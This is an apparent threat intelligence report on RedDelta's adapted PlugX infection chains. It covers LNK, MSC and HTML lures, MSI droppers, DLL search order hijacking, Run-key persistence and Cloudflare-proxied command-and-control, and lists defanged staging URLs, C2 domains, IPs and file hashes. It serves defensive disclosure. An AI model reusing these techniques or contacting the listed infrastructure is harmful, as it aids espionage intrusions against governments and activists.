##### CYBER THREAT ANALYSIS By Insikt Group® **CHINA** January 9, 2025 # Chinese State-Sponsored RedDelta Targeted Taiwan, Mongolia, and Southeast Asia with Adapted PlugX Infection Chain **RedDelta has evolved its infection** **The group consistently used** **RedDelta is potentially operating** **chain multiple times since mid-2023.** **Cloudflare's CDN to proxy C2** **out of Henan province. Insikt Group** The group has used LNK files and MSC **traffic to threat actor-controlled** identified ten IP addresses in Henan files as the first-stage components **C2 servers. This enables RedDelta** province used by RedDelta to and ultimately loaded PlugX via search to blend in with legitimate traffic and administer its PlugX C2 servers. ----- _Note: The analysis cut-off date for this report was December 6, 2024._ ## Executive Summary Between July 2023 and December 2024, Insikt Group observed the Chinese state-sponsored threat activity group RedDelta primarily targeting Mongolia, Taiwan, Myanmar, Vietnam, and Cambodia with1 an adapted infection chain to distribute their customized PlugX backdoor. The group used lure documents themed around the 2024 Taiwanese presidential candidate Terry Gou (郭台銘), the Vietnamese National Holiday, flood protection in Mongolia, and meeting invitations, including an Association of Southeast Asian Nations (ASEAN) meeting. Insikt Group observed evidence that the Mongolian Ministry of Defense was likely compromised in August 2024 and that the Communist Party of Vietnam was compromised in November 2024. RedDelta conducted spearphishing targeting the Vietnamese Ministry of Public Security; however, there were no indications of a successful compromise. Additionally, from September to December 2024, Insikt Group identified likely victims in Malaysia, Japan, the United States, Ethiopia, Brazil, Australia, and India. In the latter half of 2023, RedDelta evolved the initial part of its infection chain to leverage a Windows shortcut (LNK) file likely delivered via spearphishing, which downloaded and installed a remotely hosted Windows Installer (MSI) file. This MSI file then dropped a search order hijacking triad that loaded PlugX, as seen in previous RedDelta activity. In 2024, Insikt Group observed the group shift from using LNK files to Microsoft Management Console Snap-In Control (MSC) files as the first stage component. Most recently, the group shifted to using a spearphishing link to get the victim to load an HTML file remotely hosted on Microsoft Azure, which started the remainder of the infection chain. Since July 2023, RedDelta has consistently used the Cloudflare content delivery network (CDN) service to proxy command-and-control (C2) traffic to threat actor-controlled C2 servers. This enables the group to blend in with legitimate CDN traffic and complicates victim identification for security [researchers. Recently, Insikt Group has observed multiple state-sponsored groups leveraging](https://www.recordedfuture.com/research/bluealpha-abuses-cloudflare-tunneling-service) Cloudflare to evade detection, including the Russian state-sponsored group BlueAlpha. RedDelta continues to operate in line with Chinese strategic priorities. The group has historically targeted governments and diplomatic organizations in Southeast Asia, Mongolia, and Europe. The Asia-focused targeting in 2023 and 2024 represents a return to the group’s historical focus after [targeting European organizations in 2022 following the start of the Russia-Ukraine war. RedDelta’s](https://www.recordedfuture.com/research/reddelta-targets-european-government-organizations-continues-iterate-custom-plugx-variant) targeting of Mongolia and Taiwan is consistent with the group’s past [targeting of groups seen as](https://go.recordedfuture.com/hubfs/reports/cta-2020-0728.pdf?) threatening to the Chinese Communist Party’s power, including Mongolian non-governmental organizations (NGOs), the Vatican, and Catholic organizations in Hong Kong. 1 RedDelta closely overlaps with public reporting under the aliases BRONZE PRESIDENT, Mustang Panda, Stately Taurus, Earth Preta, Red Lich, TA416, HoneyMyte, Twill Typhoon, Vertigo Panda, and Dark Peony. 1 CTA-CN-2025-0109 Recorded Future[®] [| www.recordedfuture.com](http://www.recordedfuture.com) ----- Insikt Group followed responsible disclosure in advance of this publication per Recorded Future's prenotification policy. ## Key Findings - Since July 2023, RedDelta targeted Mongolia, Taiwan, Myanmar, Vietnam, and Cambodia with its customized backdoor PlugX. - RedDelta has evolved its infection chain multiple times since mid-2023. The group has used LNK files and MSC files as the first-stage components. In both cases, a PowerShell command downloaded and installed a remotely hosted Windows Installer (MSI) file. This MSI file dropped a malicious dynamic-link library (DLL) loader written in the Nim programming language, a legitimate binary vulnerable to search order hijacking, and an encrypted payload that ultimately loads PlugX. - The group has consistently registered new domains that use the Cloudflare content delivery network (CDN) to proxy C2 traffic to the group’s backend threat actor-controlled virtual private servers (VPSs). - Insikt Group identified IP addresses in Henan province used by RedDelta to administer its PlugX C2 servers, pointing to a potential threat actor operating location. ## Background [RedDelta has been active since](https://unit42.paloaltonetworks.com/stately-taurus-attacks-se-asian-government/) [at least 2012 and has focused on Southeast Asia and Mongolia. The](https://www.secureworks.com/research/bronze-president-targets-ngos) group has routinely adapted its targeting in response to global geopolitical events. For instance, [RedDelta targeted](https://go.recordedfuture.com/hubfs/reports/cta-2020-0728.pdf) [the Vatican and other](https://www.recordedfuture.com/research/reddelta-cyber-threat-operations) Catholic organizations with PlugX in the lead-up to 2021 talks [between China and the Vatican. The group has also compromised law enforcement and government](https://www.recordedfuture.com/research/reddelta-cyber-threat-operations) entities in India, a government organization in Indonesia, and other targets across Myanmar, Hong Kong, and Australia. [In 2022, the group shifted toward increased targeting](https://www.recordedfuture.com/research/reddelta-targets-european-government-organizations-continues-iterate-custom-plugx-variant) of European government and diplomatic entities following Russia's invasion of Ukraine. This activity used an infection chain that began by delivering an archive file (ZIP, RAR, or ISO), likely via spearphishing that contained a Windows shortcut (LNK) file disguised using a double extension (such as .doc.lnk) and a Microsoft Word icon. The archive file also ##### featured a series of nested hidden folders containing three files used to complete DLL search order hijacking: a legitimate binary, a malicious DLL loader, and an encrypted PlugX payload that iwas ultimately loaded into memory. User execution of the shortcut file led to the execution of the legitimate binary vulnerable to DLL search order hijacking. In November 2022, Insikt Group observed an evolution in tactics, in which RedDelta staged the ISO file on a threat actor-controlled domain. In March 2023, Insikt Group identified RedDelta targeting Mongolia using a similar infection chain that started with a container file (RAR, ZIP, ISO) consisting of an LNK file that triggered a DLL search order hijacking triad located within a hidden nested subdirectory. The campaign used a decoy document 2 CTA-CN-2025-0109 Recorded Future[®] [| www.recordedfuture.com](http://www.recordedfuture.com) ----- masquerading as an invitation from the World Association of Mongolia and a document purporting to be a BBC news interview about Tibetan Buddhism and Mongolia. RedDelta targeted the following groups and individuals: - Members of multiple Mongolian NGOs, including a human rights and pro-democracy NGO focused on the autonomous region of Inner Mongolia in China - Multiple Mongolian Buddhist activists based in Mongolia and Japan - Academic professionals in Mongolia and Japan - The developers of two separate Mongolian mobile applications ## Threat and Technical Analysis **_Figure 1: Timeline of RedDelta activity from 2023 and 2024 (Source: Recorded Future)_** #### Cloudflare CDN Used to Proxy Command-and-Control Traffic Beginning in July 2023, Insikt Group observed a shift across RedDelta command-and-control (C2) infrastructure characterized by the addition of [Cloudflare Origin CA transport layer security (TLS)](https://developers.cloudflare.com/ssl/origin-configuration/origin-ca/) [certificates on Transmission Control Protocol (TCP) port 443. This shift is indicative of the group’s use](https://developers.cloudflare.com/ssl/origin-configuration/origin-ca/) of the Cloudflare CDN service to proxy C2 traffic to these backend threat actor-controlled servers in an attempt to blend in among benign CDN traffic. In all cases, the domain configured to use the Cloudflare CDN service is visible via the subject alternative names (SANs) field on the accompanying TLS certificate on these backend C2s. By analyzing Cloudflare Origin CA certificates served by known RedDelta C2 servers, Insikt Group identified over 100 threat actor-controlled domains (see Appendix **A). Almost all domains are likely formerly legitimate domains re-registered via Namecheap or NameSilo** by the threat actor after expiry, likely to evade domain age and trust heuristics. In May 2024, Insikt Group identified RedDelta using Cloudflare's geofencing capabilities for the first time to restrict the downloading of the latter stages of the group’s infection chain to IP addresses geolocating to Myanmar. 3 CTA-CN-2025-0109 Recorded Future[®] [| www.recordedfuture.com](http://www.recordedfuture.com) ----- RedDelta continues leveraging these capabilities, including geofencing a malicious MSC file to Vietnam in August 2024. #### New Infection Chain Leveraging Windows Shortcut (LNK) and Windows Installer (MSI) Files Used to Continue Targeting Mongolia (July 2023) In July 2023, Insikt Group identified RedDelta targeting Mongolia with a new infection chain to load the group’s customized PlugX backdoor. In this campaign, the group shifted tactics, techniques, and procedures (TTPs) by adopting a new infection chain and using the Cloudflare CDN service to proxy C2 traffic to threat actor-controlled C2 servers. In this case, the group used a Windows LNK file to run a PowerShell command, which downloaded and installed a remotely hosted Windows installer (MSI) file. This MSI file then dropped a legitimate executable, a malicious loader DLL written in the Nim programming language, and an encrypted payload that ultimately loaded the group’s customized PlugX backdoor via DLL search order hijacking (see Figure 2). **_Figure 2: RedDelta infection chain observed in Mongolia targeting from July 2023 (Source: Recorded Future)_** 4 CTA-CN-2025-0109 Recorded Future[®] [| www.recordedfuture.com](http://www.recordedfuture.com) ----- Insikt Group identified three files observed communicating with RedDelta servers at the time (Table 1). **SHA256** **Filename(s)** **Contacted IP Address or Domain** a0a3eeb6973f12fe61e6e90fe5fe8e406 Үер усны estmongolia[.]com a8e00b31b1511a0dfe9a88109d0d129 сэрэмжлүүлэг.lnk 471e61015ff18349f4bf357447597a545 Үер усны mongolianshipregistrar[.]com 79839336188d98d299b14cff458d132 сэрэмжлүүлэг.msi 7c741c8bcd19990140f3fa4aa95bb1959 AdobePlugin.msi 103.107.104[.]37 29c9429fc47f95cf4ab9fad03040f7b **_Table 1: Observed files communicating with RedDelta servers in July 2023 (Source: Recorded Future)_** The LNK file Үер усны сэрэмжлүүлэг.lnk (translation from Mongolian: Flood warning.lnk) shown in Table 1 ran a PowerShell command shown in Figure 3 to retrieve a remotely hosted MSI file from the RedDelta domain estmongolia[.]com and install it using the install.InstallProduct method. **_Figure 3: PowerShell command run by shortcut file Үер усны сэрэмжлүүлэг.lnk (Source: Recorded Future)_** The retrieved file is Үер усны сэрэмжлүүлэг.msi in Table 1, which dropped three files following installation into the newly created folder C:\Users\Admin\AppData\Local\GkyOpucv: - A legitimate executable: ONENOTEM.exe (sha256: b9836265c6bfa17cd5e0265f32cedb1ced3b98e85990d000dc8e1298d5d25f93) - A malicious loader DLL: msi.dll (sha256: 67c23db357588489031700ea8c7dc502a6081d7d1a620c03b82a8f281aa6bde6) - An encrypted payload: NoteLogger.dat (sha256: 0df7e56610adad2ed5adfdfab07faedc08a61d9f944a5448aa62e071cffc28c4) The ONENOTEM.exe file executed the msi.dll via DLL search order hijacking, which then decrypted ``` NoteLogger.dat to load the group’s customized PlugX variant into memory. Once loaded, the PlugX ``` payload contacts the C2 domain mongolianshipregistrar[.]com. The PlugX C2 request headers [remained the same as cited in the Insikt Group report titled “RedDelta Targets European Government](https://go.recordedfuture.com/hubfs/reports/cta-2022-1223.pdf) [Organizations and Continues to Iterate Custom PlugX Variant” (page 10), shown in Figure 4. Notably,](https://go.recordedfuture.com/hubfs/reports/cta-2022-1223.pdf) the loader DLL observed in this activity was written in Nim, marking a departure from the loaders previously observed in use by RedDelta. 5 CTA-CN-2025-0109 Recorded Future[®] [| www.recordedfuture.com](http://www.recordedfuture.com) |SHA256|Filename(s)|Contacted IP Address or Domain| |---|---|---| |a0a3eeb6973f12fe61e6e90fe5fe8e406 a8e00b31b1511a0dfe9a88109d0d129|Үер усны сэрэмжлүүлэг.lnk|estmongolia[.]com| |471e61015ff18349f4bf357447597a545 79839336188d98d299b14cff458d132|Үер усны сэрэмжлүүлэг.msi|mongolianshipregistrar[.]com| |7c741c8bcd19990140f3fa4aa95bb1959 29c9429fc47f95cf4ab9fad03040f7b|AdobePlugin.msi|103.107.104[.]37| ----- **_Figure 4: RedDelta PlugX C2 headers observed in highlighted sample (Source: Recorded Future Malware Intelligence)_** Following the execution, a decoy PDF document is shown to the user (also called Үер усны ``` сэрэмжлүүлэг.pdf), which is written in Mongolian and relates to flood protection. The legitimate ``` executable and loader files were then moved to the directory C:\Users\Public\SecurityScan\. For persistence, the legitimate executable ONENOTEM.exe is executed upon start-up via the Run registry key using the key name OneNote Update. The encrypted payload NoteLogger.dat was stored in a separate hidden folder at C:\Users\Public\.vsCodes\NoteLogger.dat. **_Figure 5: Decoy document Үер усны сэрэмжлүүлэг.pdf shown to the user; it is written in Mongolian and relates to flood_** _protection (Source: Recorded Future)_ The second MSI file shown in Table 1 (AdobePlugin.msi) featured an identical infection chain to the above, dropping the following malicious files alongside the benign ONENOTEM.exe executable: 6 CTA-CN-2025-0109 Recorded Future[®] [| www.recordedfuture.com](http://www.recordedfuture.com) ----- - Nim loader msi.dll (sha256: b6f375d8e75c438d63c8be429ab3b6608f1adcd233c0cc939082a6d7371c09bb) - Encrypted payload Notelogger.dat (sha256: 095855cf6c82ae662cce34294f0969ca8c9df266736105c0297d2913a9237dd1) In this case, the PlugX payload was configured with the C2 IP address 103.107.104[.]37 rather than a domain using the Cloudflare CDN service. #### Taiwan Targeting (October 2023) In October 2023, Insikt Group identified two Taiwan-themed malware samples associated with RedDelta infrastructure. The group used decoy documents themed around the 2024 Taiwanese presidential election and a residential renovation project in Taiwan’s capital, Taipei. ##### Taiwanese Presidential Election-Themed Sample The first sample was an MSI file (sha256: c7ec098093eb08d2b36d1c37b928d716d8da021f93319a093808a7ceb3b35dc1), which dropped three files following execution: - A legitimate executable: ONENOTEM.exe (sha256: b9836265c6bfa17cd5e0265f32cedb1ced3b98e85990d000dc8e1298d5d25f93) - A malicious loader DLL: msi.dll (sha256: 651c096cf7043a01d939dff9ba58e4d69f15b2244c71b43bedb4ada8c37e8859) - An encrypted payload: NoteLogger.dat (sha256: 908ff3a80ef065ab4be1942e0d41583903f6aac02d97df6b4a92a07a633397a8) The malicious loader DLL msi.dll was loaded via DLL search order hijacking by OnesNotem.exe and ultimately decrypted the NoteLogger.dat file containing the PlugX payload. For persistence, ``` OnesNotem.exe and msi.dll were placed into the folder C:\Users\\AppData\Local\MUxPOTy\, and NoteLogger.dat was placed into the C:\ProgramData\.vscodes\ folder. The legitimate executable OnesNotem.exe was executed upon ``` start-up via the Run registry key using the key name OneNote Update in an identical manner observed in the previous Mongolia-focused targeting. The infection chain ultimately loaded the PlugX backdoor into memory, which then communicated to two RedDelta C2 domains, ivibers[.]com and _meetviberapi[.]com, which were proxied via Cloudflare to the backend threat actor-controlled C2 IP_ addresses 207.148.119[.]237 and 209.250.241[.]108. The user is also shown a Taiwan-themed decoy document regarding the Taiwanese presidential campaign of Terry Gou (郭台銘) with the filename 郭台銘選擇賴佩霞為總統副手深層考量.pdf (translation: Terry Gou carefully considers choosing Lai Peixia as presidential ``` deputy.pdf), as shown in Figure 6. ``` 7 CTA-CN-2025-0109 Recorded Future[®] [| www.recordedfuture.com](http://www.recordedfuture.com) ----- **_Figure 6: Taiwan presidential campaign-themed decoy document displayed to user following PlugX infection chain_** _(Source: Recorded Future)_ ##### Taipei Residential Renovation-Themed Sample The second identified sample, 6460c7.msi (sha256: 364f38b48565814b576f482c1e0eb4c8d58effcd033fd45136ee00640a2b5321), used an identical infection chain. In this case, the PlugX payload communicates to the RedDelta C2 domain _electrictulsa[.]com, proxied via Cloudflare to the backend threat actor-controlled C2 IP address_ _64.176.50[.]176. This sample dropped the same legitimate executable as discussed above, as well as the_ following two files: - A malicious loader DLL: msi.dll (sha256: f8c1a4c3060bc139d8ac9ad88d2632d40a96a87d58aba7862f35a396a18f42e5) - An encrypted payload: NoteLogger.dat (sha256: a5cd617434e8d0e8ae25b961830113cba7308c2f1ff274f09247de8ed74cac4f) The legitimate binary and DLL were placed into the C:\ProgramData\SamsungDriver\ folder. Like the above, the encrypted PlugX payload was placed in the C:\ProgramData\.vscodes\ folder. 8 CTA-CN-2025-0109 Recorded Future[®] [| www.recordedfuture.com](http://www.recordedfuture.com) ----- The user is also shown a decoy document themed around a residential renovation project in Taipei with the filename 水源路二至五期整建住宅都市更新推動說明.pdf (translation: Instructions for urban ``` renewal promotion of residential buildings in Phases 2 to 5 of Shuiyuan Road.pdf), as shown in Figure 7. ``` **_Figure 7: Taipei residential renovation-themed decoy document displayed to user following PlugX infection chain (Source:_** _Recorded Future)_ #### Myanmar Targeting and Use of Microsoft Management Console (MSC) Files (May 2024) Insikt Group observed RedDelta targeting Myanmar with an updated infection chain in May 2024, as shown in Figure 8. This RedDelta activity involved an adapted initial infection chain, now incorporating Microsoft Management Console Snap-In Control (MSC) files as the first stage component instead of the Windows LNK files seen in previous RedDelta activity. Upon execution, the MSC file was configured to 9 CTA-CN-2025-0109 Recorded Future[®] [| www.recordedfuture.com](http://www.recordedfuture.com) ----- run a PowerShell command that downloaded and installed a remotely hosted MSI file, with the remainder of the infection chain closely resembling the RedDelta activity described above. **_Figure 8: Updated RedDelta infection chain observed in May 2024 (Source: Recorded Future)_** Insikt Group identified the group using Cloudflare's geofencing capabilities for the first time to restrict downloading the latter stages of the group’s infection chain to target countries — in this case, Myanmar. ##### Initial Microsoft Management Console Snap-In Control (.msc) Files RedDelta domains were used to stage files fetched via initial MSC samples likely distributed via spearphishing (see Table 2). In May 2024, the Myanmar National Cyber Security Center [posted on a](https://www.virustotal.com/gui/file/1cbf860e99dcd2594a9de3c616ee86c894d85145bc42e55f4fed3a31ef7c2292/community) public malware repository that Meeting_Invitation.msc (sha256: 1cbf860e99dcd2594a9de3c616ee86c894d85145bc42e55f4fed3a31ef7c2292) was a lure document targeting government entities. These MSC files are executed using the native Windows binary mmc.exe and display a console purporting to contain a lure PDF document (see Figure 9). 10 CTA-CN-2025-0109 Recorded Future[®] [| www.recordedfuture.com](http://www.recordedfuture.com) ----- |SHA256|File Name|Next Stage URL| |---|---|---| |1cbf860e99dcd2594a9de3c616ee86c8 94d85145bc42e55f4fed3a31ef7c2292|Meeting_Invita tion.msc|https[:]//versaillesinfo[.]com/brjwcabz| |54549745868b27f5e533a99b3c10f29b c5504d01bd0792568f2ad1569625b1fd|240422 264-24 SOLO airfield surveys.msc|https[:]//lifeyomi[.]com/trkziu| |8c9e1f17e82369d857e5bf3c41f0609b1e 75fd5a4080634bc8ae7291ebe2186c|Meeting Invitation.msc|https[:]//lebohdc[.]com/uleuodmm| **_Table 2: RedDelta Microsoft Management Console Snap-In Control (MSC) files observed in May 2024 (Source: Recorded_** _Future)_ **_Figure 9: Screenshot of Microsoft Management Console Snap-In Control file sample Meeting_Invitation.msc (Source:_** _Recorded Future)_ When the user clicks the purported PDF hyperlink, the MSC file runs a PowerShell command to download and install a remotely hosted MSI file via the command shown in Figure 10. This command resembles those observed in historical RedDelta LNK files described above. 11 CTA-CN-2025-0109 Recorded Future[®] [| www.recordedfuture.com](http://www.recordedfuture.com) ----- **_Figure 10: PowerShell command executed by a.msi file to fetch and install a remotely staged Windows Installer file (Source:_** _Recorded Future_ #### Next Stage Windows Installer (MSI) and DLL Search Order Hijacking Chain Upon installation, the fetched MSI file brjwcabz.msi (sha256: d4b9f7c167bc69471baf9e18afd924cf9583b12eee0f088c98abfc55efd77617) dropped three files: - A legitimate executable: inkform.exe (sha256: 87d0abc1c305f7ce8e98dc86712f841dd491dfda1c1fba42a70d97a84c5a9c70) - A malicious loader DLL: FormDll.dll (sha256: 288e79407daae7ae9483ef789d035d464cf878a611db453675ba1a2f6beb1a03) - An encrypted payload: inkformDB.dat (sha256: 4ac2a633904b0da3ac471776ecbaded91e1f3a5107630fafde76868cace46051) Following the execution of this DLL order hijacking chain, the group’s customized PlugX variant is loaded into memory and uses the C2 domain shreyaninfotech[.]com. In this analyzed sample, following execution, the three DLL search order hijacking files were copied to a new location to enable persistence via run registry keys. Insikt Group observed the use of multiple file paths within the same sample, which are randomly selected during each initial execution (Figure 11). ``` C:\Users\Admin\AppData\Roaming\.inkform\inkformDB.dat C:\Users\Admin\AppData\Roaming\VirtualFile\inkform.exe C:\Users\Admin\AppData\Roaming\VirtualFile\FormDll.dll C:\Users\Public\.inkform\inkformDB.dat C:\Users\Public\Intelnet\FormDll.dll C:\Users\Public\Intelnet\inkform.exe C:\Users\Public\.inkform\inkformDB.dat C:\Users\Public\SecurityScan\FormDll.dll C:\Users\Public\SecurityScan\inkform.exe C:\ProgramData\.inkform\inkformDB.dat C:\ProgramData\Intelnet\FormDll.dll C:\ProgramData\Intelnet\inkform.exe C:\Users\Admin\.inkform\inkformDB.dat C:\Users\Admin\SamsungDriver\inkform.exe C:\Users\Admin\SamsungDriver\FormDll.dll ``` **_Figure 11: Observed file paths used by brjwcabz.msi, which are randomly selected during initial execution (Source: Recorded_** _Future)_ A new run registry key value, inkform Update, is also created for persistence, which executes ``` inkform.exe upon user login. In addition to the use of the signed Microsoft inkform.exe executable ``` for DLL search order hijacking, Insikt Group also observed the use of a second signed executable 12 CTA-CN-2025-0109 Recorded Future[®] [| www.recordedfuture.com](http://www.recordedfuture.com) ----- #### Mongolian Ministry of Defense, Myanmar, and Vietnam Targeting (August 2024) In August 2024, Insikt Group observed renewed RedDelta activity that compromised the Mongolian Ministry of Defense and entities in Myanmar with the group’s customized PlugX backdoor. The group also conducted some limited targeting in Bahrain and Ethiopia. In addition, RedDelta conducted spearphishing against the Vietnamese Ministry of Public Security; however, there were no indications of a successful compromise. In this observed activity, the Windows Installer files all dropped a legitimate and lesser-observed Logitech executable vulnerable to DLL search order hijacking: LDeviceDetectionHelper.exe (sha256: 282fc12e4f36b6e2558f5dd33320385f41e72d3a90d0d3777a31ef1ba40722d6), a malicious loader DLL written in NIM, and a DAT file containing the encrypted PlugX payload. [For the first time, Insikt Group observed that the MSC files all used the GrimResource](https://www.elastic.co/security-labs/grimresource) technique to execute arbitrary code in Microsoft Management Console (mmc.exe) files (Table 3). **SHA256** **Filename** **Next Stage URL** [00619a5312d6957248bac777c44c0e9dd871](https://app.recordedfuture.com/portal/intelligence-card/hash%3A00619a5312d6957248bac777c44c0e9dd871950c6785830695c51184217a1437/overview) `Pg 151 vv nghi` _kxmmcdmnb[.]online (likely_ [950c6785830695c51184217a1437](https://app.recordedfuture.com/portal/intelligence-card/hash%3A00619a5312d6957248bac777c44c0e9dd871950c6785830695c51184217a1437/overview) `le Quoc khanh` geofenced to Vietnam) ``` 2.9.msc ``` [ca0dfda9a329f5729b3ca07c6578b3b6560e](https://app.recordedfuture.com/portal/intelligence-card/hash%3Aca0dfda9a329f5729b3ca07c6578b3b6560e7cfaeff8d988d1fe8c9ca6896da5/overview) `Meeting` https[:]//cdn7s65[.]z13[.]web.co [7cfaeff8d988d1fe8c9ca6896da5](https://app.recordedfuture.com/portal/intelligence-card/hash%3Aca0dfda9a329f5729b3ca07c6578b3b6560e7cfaeff8d988d1fe8c9ca6896da5/overview) `invitation.msc` re[.]windows[.]net [eae187a91f97838dbb327b684d6a954beee4](https://app.recordedfuture.com/portal/intelligence-card/hash%3Aeae187a91f97838dbb327b684d6a954beee49f522a829a1b51c1621218039040/overview) `BCTT 02.9 AM` lokjopppkuimlpo[.]shop [9f522a829a1b51c1621218039040](https://app.recordedfuture.com/portal/intelligence-card/hash%3Aeae187a91f97838dbb327b684d6a954beee49f522a829a1b51c1621218039040/overview) `Final.docx.msc` [d0c4eb52ea0041cab5d9e1aea17e0fe8a5888](https://app.recordedfuture.com/portal/intelligence-card/hash%3Ad0c4eb52ea0041cab5d9e1aea17e0fe8a588879a03415f609b195cfbd69caafc/overview) `Meeting.msc` goclamdep[.]net [79a03415f609b195cfbd69caafc](https://app.recordedfuture.com/portal/intelligence-card/hash%3Ad0c4eb52ea0041cab5d9e1aea17e0fe8a588879a03415f609b195cfbd69caafc/overview) 13 CTA-CN-2025-0109 Recorded Future[®] [| www.recordedfuture.com](http://www.recordedfuture.com) |SHA256|Filename|Next Stage URL| |---|---|---| |00619a5312d6957248bac777c44c0e9dd871 950c6785830695c51184217a1437|Pg 151 vv nghi le Quoc khanh 2.9.msc|kxmmcdmnb[.]online (likely geofenced to Vietnam)| |ca0dfda9a329f5729b3ca07c6578b3b6560e 7cfaeff8d988d1fe8c9ca6896da5|Meeting invitation.msc|https[:]//cdn7s65[.]z13[.]web.co re[.]windows[.]net| |eae187a91f97838dbb327b684d6a954beee4 9f522a829a1b51c1621218039040|BCTT 02.9 AM Final.docx.msc|lokjopppkuimlpo[.]shop| |d0c4eb52ea0041cab5d9e1aea17e0fe8a5888 79a03415f609b195cfbd69caafc|Meeting.msc|goclamdep[.]net| ----- |6784b646378c650a86ba4fdd4baaaf608e5e cdf171c71bb7720f83965cc8c96f|Meeting.msc|goclamdep[.]net| |---|---|---| 14 CTA-CN-2025-0109 Recorded Future[®] [| www.recordedfuture.com](http://www.recordedfuture.com) ----- #### Use of HTML Files and Wider Targeting (September–November 2024) In September 2024, Insikt Group became aware of RedDelta using HTML files, disseminated by links in phishing emails, that directed the user to malicious MSC files if the user was running Windows OS. After distributing the malicious MSC via HTML file, RedDelta continued to use the same infection chain described above and also used the lesser-observed LDeviceDetectionHelper.exe for DLL search order hijacking. In October 2024, Insikt Group observed the group using a new legitimate executable ``` imecmnt.exe (sha256: ``` 80a7ff01de553cb099452cb9fac5762caf96c0c3cd9c5ad229739da7f2a2ca72). **_Figure 15: RedDelta infection chain observed in use in September 2024 (Source: Recorded Future)_** 15 CTA-CN-2025-0109 Recorded Future[®] [| www.recordedfuture.com](http://www.recordedfuture.com) ----- |SHA256|File Name|Next Stage URL| |---|---|---| |c1f27bed733c5bcf76d2e37e1f905d6c4e7ab aeb0ea8975fca2d300c19c5e84f|ADSOM-Plus - Meeting Programme.msc|https[:]//elevateecom[.]com/deq cehfg| |397afb74746b2fe01abc63789412b38f44ceb 234a278a04b85b2bb5b4e64cc8c|Meeting Invitation.msc|https[:]//vabercoach[.]com/ueni c| |49abaa2ba33af3ebde62af1979ed7a442986 6f4f708e0d8e9cfffcfa7a279604|Meeting Procedure.msc|https[:]//artbykathrynmorin[.]co m/lczjnmum| Insikt Group identified an infection chain themed around the Microsoft Office Input Method Editor (IME), which enables users to input non-QWERTY characters. The Windows Installer (MSI) file ``` Adobe-Setup.msi (sha256: ``` 62adbe84f0f19e897df4e0573fc048272e0b537d5b34f811162b8526b9afaf32) dropped three files: - A legitimate executable: imecmnt.exe (sha256: 80a7ff01de553cb099452cb9fac5762caf96c0c3cd9c5ad229739da7f2a2ca72) that Insikt had not previously observed RedDelta using - A malicious loader DLL (sha256: 557f04c6ab6f06e11032b25bd3989209de90de898d145b2d3a56e3c9f354d884) 16 CTA-CN-2025-0109 Recorded Future[®] [| www.recordedfuture.com](http://www.recordedfuture.com) ----- - An encrypted payload: officeime.dat (sha256: 5dae5254493df246c15e52fd246855a5d0a248f36925cecee141348112776275) The PlugX C2 in this infection chain was 116.206.178[.]67. RedDelta also recently [used DLL sideloading](https://unit42.paloaltonetworks.com/stately-taurus-abuses-vscode-southeast-asian-espionage/) of the legitimate executable imecmnt.exe to load ShadowPad in an espionage operation targeting Southeast Asian government entities. Insikt Group observed an IP address associated with the Communist Party of Vietnam communicating with PlugX C2 103.238.227[.]183 in November 2024. Additionally, from September to December 2024, Insikt Group identified communications between RedDelta PlugX servers 103.238.227[.]183 and _103.238.225[.]248, as well as unattributable IP addresses in Myanmar, Malaysia, Japan, the United_ States, Ethiopia, Brazil, Australia, and India. **_Figure 16: The Communist Party of Vietnam IP address geolocates near the Central Office of the Communist Party of Vietnam_** _(Vietnamese: “Văn phòng Trung ương Đảng Cộng sản”) in Hanoi, Vietnam (Source: Google Maps)_ #### RedDelta Administration Servers From August to December 2024, Insikt Group identified ten RedDelta administration servers communicating with known RedDelta C2s 103.238.227[.]183 and 103.238.225[.]248 on port TCP 5000 (Table 5). These IPs are all registered to China Unicom Henan province, suggesting the threat actor may be operating out of Henan province. 17 CTA-CN-2025-0109 Recorded Future[®] [| www.recordedfuture.com](http://www.recordedfuture.com) ----- 18 CTA-CN-2025-0109 Recorded Future[®] [| www.recordedfuture.com](http://www.recordedfuture.com) ----- ## Mitigations Users should conduct the following measures to detect and mitigate observed TTPs associated with RedDelta activity: - Deploy the YARA and Sigma rules written by Insikt Group, detailed in **Appendix C, to detect** RedDelta MSI, DLL, and LNK files. - Configure your intrusion detection systems (IDS), intrusion prevention systems (IPS), or any network defense mechanisms in place to alert on — and upon review, consider blocking illicit connection attempts from — the external IP addresses and domains listed in Appendix A. - Keep all software and applications up to date, particularly operating systems, antivirus software, and core system utilities. - Filter email correspondence and scrutinize attachments for malware. - Make regular backups of your system and store the backups offline, preferably offsite so data cannot be accessed via the network. - Adhere to strict compartmentalization of company-sensitive data. In particular, look at which data anyone with access to an employee account or device would have access to (for example, through device or account takeover via phishing). - Strongly consider instituting role-based access, limiting company-wide data access, and restricting access to sensitive data. - Employ host-based controls; one of the best defenses and warning signals to thwart attacks is to conduct client-based host logging and intrusion detection capabilities. - Disable basic and legacy authentication where possible, as these can allow attackers to bypass in-place security measures. - Implement basic incident response and detection deployments and controls, such as network IDS, NetFlow collection, host logging, and web proxy, alongside manual monitoring of detection sources. - Practice network segmentation and ensure special protections exist for sensitive information, such as multifactor authentication and extremely restricted access and storage on systems only accessible via an internal network. - [Recorded Future Third-Party Intelligence module](https://www.recordedfuture.com/license-options/) users can monitor real-time output to identify suspected targeted intrusion activity involving key vendors and partners within physical, network, and software supply chains. - By monitoring Malicious Traffic Analysis (MTA), Recorded Future customers can alert on and proactively monitor infrastructure that may be involved in notable communication to known RedDelta command-and-control (C2) IP addresses. - [Install the Recorded Future Threat Intelligence Browser Extension](https://www.recordedfuture.com/platform/browser-extension) to get instant access to threat intelligence from any web-based resource. This extension enables users to process alerts faster within their security information and event management (SIEM) and prioritize vulnerabilities for patching. - Review public guidance on mitigating common TTPs used by Chinese state-sponsored groups [(1,](https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-158a) [2,](https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a) [3,](https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/Mitigating%20Recent%20VPN%20Vulnerabilities%20-%20Copy.pdf) [4). Review Insikt Group’s report “Charting China’s Climb as a Leading Global Cyber](https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-258a) 19 CTA-CN-2025-0109 Recorded Future[®] [| www.recordedfuture.com](http://www.recordedfuture.com) ----- [Power” for trends and recommendations for mitigating Chinese advanced persistent threat (APT)](https://www.recordedfuture.com/charting-chinas-climb-leading-global-cyber-power) activity more broadly. ## Outlook Insikt Group anticipates that RedDelta will continue to target organizations worldwide with their customized PlugX backdoor, focusing on Southeast Asia and China’s periphery (Mongolia and Taiwan). RedDelta will likely continue to target governments, religious 